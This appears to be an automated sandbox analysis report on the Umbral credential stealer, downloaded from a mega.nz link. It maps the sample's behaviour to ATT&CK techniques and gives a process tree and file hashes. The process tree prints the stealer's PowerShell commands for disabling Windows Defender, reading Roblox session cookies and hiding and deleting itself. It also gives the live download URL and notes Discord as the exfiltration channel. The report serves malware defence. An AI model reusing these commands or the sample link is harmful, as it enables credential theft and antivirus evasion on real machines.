umbral | hxxps://mega[.]nz/file/ME5DXRAD#7_smvBO_pP9qEHRNhLeZ1rCo9ChMxpj_4H0V_OuM_Ow

Analysis

max time kernel
401s
max time network
412s
platform
windows11-21h2_x64
resource
win11-20240802-en
resource tags

arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system
submitted
15-09-2024 15:51

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://mega.nz/file/ME5DXRAD#7_smvBO_pP9qEHRNhLeZ1rCo9ChMxpj_4H0V_OuM_Ow

Score

10^/10

umbral credential_access discovery execution spyware stealer

Malware Config

Signatures

Detect Umbral payload 2 IoCs

resource	yara_rule
behavioral1/files/0x000100000002aac1-230.dat	family_umbral
behavioral1/memory/3776-283-0x000001D1108D0000-0x000001D110910000-memory.dmp	family_umbral

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4932	powershell.exe
2452	powershell.exe
1608	powershell.exe
3948	powershell.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Bootstrapper.exe

Executes dropped EXE 1 IoCs

pid	Process
3776	Bootstrapper.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
39	discord.com
15	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
4	ip-api.com

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
3488	cmd.exe
1220	PING.EXE

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
3580	wmic.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

NTFS ADS 3 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 836398.crdownload:SmartScreen	msedge.exe
File created	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\HHX51.scr\:SmartScreen:$DATA	Bootstrapper.exe
File created	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\HHX51.scr\:Zone.Identifier:$DATA	Bootstrapper.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
1220	PING.EXE

Suspicious behavior: EnumeratesProcesses 28 IoCs

pid	Process
1952	msedge.exe
1952	msedge.exe
4704	msedge.exe
4704	msedge.exe
2500	identity_helper.exe
2500	identity_helper.exe
3948	msedge.exe
3948	msedge.exe
3776	Bootstrapper.exe
3948	powershell.exe
3948	powershell.exe
3948	powershell.exe
4932	powershell.exe
4932	powershell.exe
4932	powershell.exe
2452	powershell.exe
2452	powershell.exe
2452	powershell.exe
1428	powershell.exe
1428	powershell.exe
1428	powershell.exe
1608	powershell.exe
1608	powershell.exe
1608	powershell.exe
2936	msedge.exe
2936	msedge.exe
2936	msedge.exe
2936	msedge.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs

pid	Process
4704	msedge.exe
4704	msedge.exe
4704	msedge.exe
4704	msedge.exe
4704	msedge.exe
4704	msedge.exe
4704	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: 33	1164	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	1164	AUDIODG.EXE
Token: SeDebugPrivilege	3776	Bootstrapper.exe
Token: SeIncreaseQuotaPrivilege	4088	wmic.exe
Token: SeSecurityPrivilege	4088	wmic.exe
Token: SeTakeOwnershipPrivilege	4088	wmic.exe
Token: SeLoadDriverPrivilege	4088	wmic.exe
Token: SeSystemProfilePrivilege	4088	wmic.exe
Token: SeSystemtimePrivilege	4088	wmic.exe
Token: SeProfSingleProcessPrivilege	4088	wmic.exe
Token: SeIncBasePriorityPrivilege	4088	wmic.exe
Token: SeCreatePagefilePrivilege	4088	wmic.exe
Token: SeBackupPrivilege	4088	wmic.exe
Token: SeRestorePrivilege	4088	wmic.exe
Token: SeShutdownPrivilege	4088	wmic.exe
Token: SeDebugPrivilege	4088	wmic.exe
Token: SeSystemEnvironmentPrivilege	4088	wmic.exe
Token: SeRemoteShutdownPrivilege	4088	wmic.exe
Token: SeUndockPrivilege	4088	wmic.exe
Token: SeManageVolumePrivilege	4088	wmic.exe
Token: 33	4088	wmic.exe
Token: 34	4088	wmic.exe
Token: 35	4088	wmic.exe
Token: 36	4088	wmic.exe
Token: SeIncreaseQuotaPrivilege	4088	wmic.exe
Token: SeSecurityPrivilege	4088	wmic.exe
Token: SeTakeOwnershipPrivilege	4088	wmic.exe
Token: SeLoadDriverPrivilege	4088	wmic.exe
Token: SeSystemProfilePrivilege	4088	wmic.exe
Token: SeSystemtimePrivilege	4088	wmic.exe
Token: SeProfSingleProcessPrivilege	4088	wmic.exe
Token: SeIncBasePriorityPrivilege	4088	wmic.exe
Token: SeCreatePagefilePrivilege	4088	wmic.exe
Token: SeBackupPrivilege	4088	wmic.exe
Token: SeRestorePrivilege	4088	wmic.exe
Token: SeShutdownPrivilege	4088	wmic.exe
Token: SeDebugPrivilege	4088	wmic.exe
Token: SeSystemEnvironmentPrivilege	4088	wmic.exe
Token: SeRemoteShutdownPrivilege	4088	wmic.exe
Token: SeUndockPrivilege	4088	wmic.exe
Token: SeManageVolumePrivilege	4088	wmic.exe
Token: 33	4088	wmic.exe
Token: 34	4088	wmic.exe
Token: 35	4088	wmic.exe
Token: 36	4088	wmic.exe
Token: SeDebugPrivilege	3948	powershell.exe
Token: SeDebugPrivilege	4932	powershell.exe
Token: SeDebugPrivilege	2452	powershell.exe
Token: SeDebugPrivilege	1428	powershell.exe
Token: SeIncreaseQuotaPrivilege	4400	wmic.exe
Token: SeSecurityPrivilege	4400	wmic.exe
Token: SeTakeOwnershipPrivilege	4400	wmic.exe
Token: SeLoadDriverPrivilege	4400	wmic.exe
Token: SeSystemProfilePrivilege	4400	wmic.exe
Token: SeSystemtimePrivilege	4400	wmic.exe
Token: SeProfSingleProcessPrivilege	4400	wmic.exe
Token: SeIncBasePriorityPrivilege	4400	wmic.exe
Token: SeCreatePagefilePrivilege	4400	wmic.exe
Token: SeBackupPrivilege	4400	wmic.exe
Token: SeRestorePrivilege	4400	wmic.exe
Token: SeShutdownPrivilege	4400	wmic.exe
Token: SeDebugPrivilege	4400	wmic.exe
Token: SeSystemEnvironmentPrivilege	4400	wmic.exe
Token: SeRemoteShutdownPrivilege	4400	wmic.exe

Suspicious use of FindShellTrayWindow 35 IoCs

pid	Process
4704	msedge.exe
4704	msedge.exe
4704	msedge.exe
4704	msedge.exe
4704	msedge.exe
4704	msedge.exe
4704	msedge.exe
4704	msedge.exe
4704	msedge.exe
4704	msedge.exe
4704	msedge.exe
4704	msedge.exe
4704	msedge.exe
4704	msedge.exe
4704	msedge.exe
4704	msedge.exe
4704	msedge.exe
4704	msedge.exe
4704	msedge.exe
4704	msedge.exe
4704	msedge.exe
4704	msedge.exe
4704	msedge.exe
4704	msedge.exe
4704	msedge.exe
4704	msedge.exe
4704	msedge.exe
4704	msedge.exe
4704	msedge.exe
4704	msedge.exe
4704	msedge.exe
4704	msedge.exe
4704	msedge.exe
4704	msedge.exe
4704	msedge.exe

Suspicious use of SendNotifyMessage 12 IoCs

pid	Process
4704	msedge.exe
4704	msedge.exe
4704	msedge.exe
4704	msedge.exe
4704	msedge.exe
4704	msedge.exe
4704	msedge.exe
4704	msedge.exe
4704	msedge.exe
4704	msedge.exe
4704	msedge.exe
4704	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4704 wrote to memory of 1580	4704	msedge.exe	80
PID 4704 wrote to memory of 1580	4704	msedge.exe	80
PID 4704 wrote to memory of 2292	4704	msedge.exe	82
PID 4704 wrote to memory of 2292	4704	msedge.exe	82
PID 4704 wrote to memory of 2292	4704	msedge.exe	82
PID 4704 wrote to memory of 2292	4704	msedge.exe	82
PID 4704 wrote to memory of 2292	4704	msedge.exe	82
PID 4704 wrote to memory of 2292	4704	msedge.exe	82
PID 4704 wrote to memory of 2292	4704	msedge.exe	82
PID 4704 wrote to memory of 2292	4704	msedge.exe	82
PID 4704 wrote to memory of 2292	4704	msedge.exe	82
PID 4704 wrote to memory of 2292	4704	msedge.exe	82
PID 4704 wrote to memory of 2292	4704	msedge.exe	82
PID 4704 wrote to memory of 2292	4704	msedge.exe	82
PID 4704 wrote to memory of 2292	4704	msedge.exe	82
PID 4704 wrote to memory of 2292	4704	msedge.exe	82
PID 4704 wrote to memory of 2292	4704	msedge.exe	82
PID 4704 wrote to memory of 2292	4704	msedge.exe	82
PID 4704 wrote to memory of 2292	4704	msedge.exe	82
PID 4704 wrote to memory of 2292	4704	msedge.exe	82
PID 4704 wrote to memory of 2292	4704	msedge.exe	82
PID 4704 wrote to memory of 2292	4704	msedge.exe	82
PID 4704 wrote to memory of 2292	4704	msedge.exe	82
PID 4704 wrote to memory of 2292	4704	msedge.exe	82
PID 4704 wrote to memory of 2292	4704	msedge.exe	82
PID 4704 wrote to memory of 2292	4704	msedge.exe	82
PID 4704 wrote to memory of 2292	4704	msedge.exe	82
PID 4704 wrote to memory of 2292	4704	msedge.exe	82
PID 4704 wrote to memory of 2292	4704	msedge.exe	82
PID 4704 wrote to memory of 2292	4704	msedge.exe	82
PID 4704 wrote to memory of 2292	4704	msedge.exe	82
PID 4704 wrote to memory of 2292	4704	msedge.exe	82
PID 4704 wrote to memory of 2292	4704	msedge.exe	82
PID 4704 wrote to memory of 2292	4704	msedge.exe	82
PID 4704 wrote to memory of 2292	4704	msedge.exe	82
PID 4704 wrote to memory of 2292	4704	msedge.exe	82
PID 4704 wrote to memory of 2292	4704	msedge.exe	82
PID 4704 wrote to memory of 2292	4704	msedge.exe	82
PID 4704 wrote to memory of 2292	4704	msedge.exe	82
PID 4704 wrote to memory of 2292	4704	msedge.exe	82
PID 4704 wrote to memory of 2292	4704	msedge.exe	82
PID 4704 wrote to memory of 2292	4704	msedge.exe	82
PID 4704 wrote to memory of 1952	4704	msedge.exe	83
PID 4704 wrote to memory of 1952	4704	msedge.exe	83
PID 4704 wrote to memory of 3556	4704	msedge.exe	84
PID 4704 wrote to memory of 3556	4704	msedge.exe	84
PID 4704 wrote to memory of 3556	4704	msedge.exe	84
PID 4704 wrote to memory of 3556	4704	msedge.exe	84
PID 4704 wrote to memory of 3556	4704	msedge.exe	84
PID 4704 wrote to memory of 3556	4704	msedge.exe	84
PID 4704 wrote to memory of 3556	4704	msedge.exe	84
PID 4704 wrote to memory of 3556	4704	msedge.exe	84
PID 4704 wrote to memory of 3556	4704	msedge.exe	84
PID 4704 wrote to memory of 3556	4704	msedge.exe	84
PID 4704 wrote to memory of 3556	4704	msedge.exe	84
PID 4704 wrote to memory of 3556	4704	msedge.exe	84
PID 4704 wrote to memory of 3556	4704	msedge.exe	84
PID 4704 wrote to memory of 3556	4704	msedge.exe	84
PID 4704 wrote to memory of 3556	4704	msedge.exe	84
PID 4704 wrote to memory of 3556	4704	msedge.exe	84
PID 4704 wrote to memory of 3556	4704	msedge.exe	84
PID 4704 wrote to memory of 3556	4704	msedge.exe	84
PID 4704 wrote to memory of 3556	4704	msedge.exe	84
PID 4704 wrote to memory of 3556	4704	msedge.exe	84

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2364	attrib.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://mega.nz/file/ME5DXRAD#7_smvBO_pP9qEHRNhLeZ1rCo9ChMxpj_4H0V_OuM_Ow
1⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4704
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd63163cb8,0x7ffd63163cc8,0x7ffd63163cd8
  2⤵
  PID:1580
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1864,15272757534187349829,15065603381716620283,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1924 /prefetch:2
  2⤵
  PID:2292
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1864,15272757534187349829,15065603381716620283,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2368 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1952
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1864,15272757534187349829,15065603381716620283,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2532 /prefetch:8
  2⤵
  PID:3556
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1864,15272757534187349829,15065603381716620283,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3268 /prefetch:1
  2⤵
  PID:3468
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1864,15272757534187349829,15065603381716620283,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3272 /prefetch:1
  2⤵
  PID:4144
- C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1864,15272757534187349829,15065603381716620283,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5448 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2500
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1864,15272757534187349829,15065603381716620283,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5520 /prefetch:1
  2⤵
  PID:3396
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1864,15272757534187349829,15065603381716620283,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5592 /prefetch:1
  2⤵
  PID:1160
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1864,15272757534187349829,15065603381716620283,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3292 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3948
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1864,15272757534187349829,15065603381716620283,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5772 /prefetch:1
  2⤵
  PID:4820
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1864,15272757534187349829,15065603381716620283,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5556 /prefetch:1
  2⤵
  PID:3456
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1864,15272757534187349829,15065603381716620283,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5720 /prefetch:8
  2⤵
  PID:1500
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1864,15272757534187349829,15065603381716620283,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5988 /prefetch:1
  2⤵
  PID:1072
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1864,15272757534187349829,15065603381716620283,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6204 /prefetch:8
  2⤵
  PID:696
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1864,15272757534187349829,15065603381716620283,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3708 /prefetch:8
  2⤵
  PID:4856
- C:\Users\Admin\Downloads\Bootstrapper.exe
  "C:\Users\Admin\Downloads\Bootstrapper.exe"
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3776
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4088
- - C:\Windows\SYSTEM32\attrib.exe
    "attrib.exe" +h +s "C:\Users\Admin\Downloads\Bootstrapper.exe"
    3⤵
    - Views/modifies file attributes
    PID:2364
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\Bootstrapper.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3948
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4932
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2452
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1428
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" os get Caption
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4400
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" computersystem get totalphysicalmemory
    3⤵
    PID:1776
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    PID:2712
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:1608
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic" path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:3580
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\Downloads\Bootstrapper.exe" && pause
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:3488
  - - C:\Windows\system32\PING.EXE
      ping localhost
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:1220
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1864,15272757534187349829,15065603381716620283,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=3732 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2936

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4872

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4820

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004C4 0x00000000000004CC
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1164

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\HHX51.scr:Zone.Identifier

Filesize
52B

MD5
dfcb8dc1e74a5f6f8845bcdf1e3dee6c

SHA1
ba515dc430c8634db4900a72e99d76135145d154

SHA256
161510bd3ea26ff17303de536054637ef1de87a9bd6966134e85d47fc4448b67

SHA512
c0eff5861c2df0828f1c1526536ec6a5a2e625a60ab75e7051a54e6575460c3af93d1452e75ca9a2110f38a84696c7e0e1e44fb13daa630ffcdda83db08ff78d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
627073ee3ca9676911bee35548eff2b8

SHA1
4c4b68c65e2cab9864b51167d710aa29ebdcff2e

SHA256
85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

SHA512
3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
d30a5618854b9da7bcfc03aeb0a594c4

SHA1
7f37105d7e5b1ecb270726915956c2271116eab7

SHA256
3494c446aa3cb038f1d920b26910b7fe1f4286db78cb3f203ad02cb93889c1a8

SHA512
efd488fcd1729017a596ddd2950bff07d5a11140cba56ff8e0c62ef62827b35c22857bc4f5f5ea11ccc2e1394c0b3ee8651df62a25e66710f320e7a2cf4d1a77

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
03a56f81ee69dd9727832df26709a1c9

SHA1
ab6754cc9ebd922ef3c37b7e84ff20e250cfde3b

SHA256
65d97e83b315d9140f3922b278d08352809f955e2a714fedfaea6283a5300e53

SHA512
e9915f11e74c1bcf7f80d1bcdc8175df820af30f223a17c0fe11b6808e5a400550dcbe59b64346b7741c7c77735abefaf2c988753e11d086000522a05a0f7781

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
72B

MD5
0661d5e3adf80ac0cd66ae35f1f767e8

SHA1
90adf9a282a3ce9ead29f2ccd73fdc0a4c68b2c2

SHA256
571175520374793b03045ee8743096636b3f7df2f667806bd04e81ce4e01e68c

SHA512
d5f20c862f9fe81206857d5ab1ed08e6e99a9e012ab1df3ff511a0e5cd3a8b3a28a0b62fde50ab8558072d8ea4787a8bf144f5f4c49418d20446f119f0f7abfc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies

Filesize
20KB

MD5
4075d024e01c6799329486e1336687ce

SHA1
6d0df3dbed4d62e0e754b7469eced39e74ef58ea

SHA256
37caa38cd67b40043655d452a2e246a0dee53fa5e8f899505174eb81041e9a8e

SHA512
9a345fbabf14b0fb3780c24ad8823dc74a679842d53b383d1907cdab0d38847fe2adfeb175d7125fcbf2ae9ea3c5d12270c9364688cd6753134db415f4e998a5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_mega.nz_0.indexeddb.leveldb\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log

Filesize
176B

MD5
